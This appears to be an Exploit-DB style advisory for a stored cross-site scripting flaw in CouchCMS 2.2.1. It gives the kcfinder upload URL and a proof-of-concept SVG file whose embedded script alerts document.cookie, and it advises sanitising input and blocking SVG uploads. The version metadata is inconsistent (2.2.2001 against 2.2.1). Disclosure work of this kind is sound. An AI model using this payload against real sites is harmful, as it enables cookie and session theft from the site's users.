CouchCMS 2.2.1 - XSS via SVG file upload

vendor:

CouchCMS

by:

xxcdd

4.3

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: CouchCMS

Affected Version From: 2.2.2001

Affected Version To: 2.2.2001

Patch Exists: NO

Related CWE:

CPE: a:couchcms:couchcms:2.2.1

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2021

CouchCMS 2.2.1 – XSS via SVG file upload

An issue was discovered in CouchCMS v2.2.1 that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.

Mitigation:

Sanitize user input and disallow SVG file uploads.

Source

Exploit-DB raw data:

# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7

An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.

upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
<http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en>

xss.svg content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>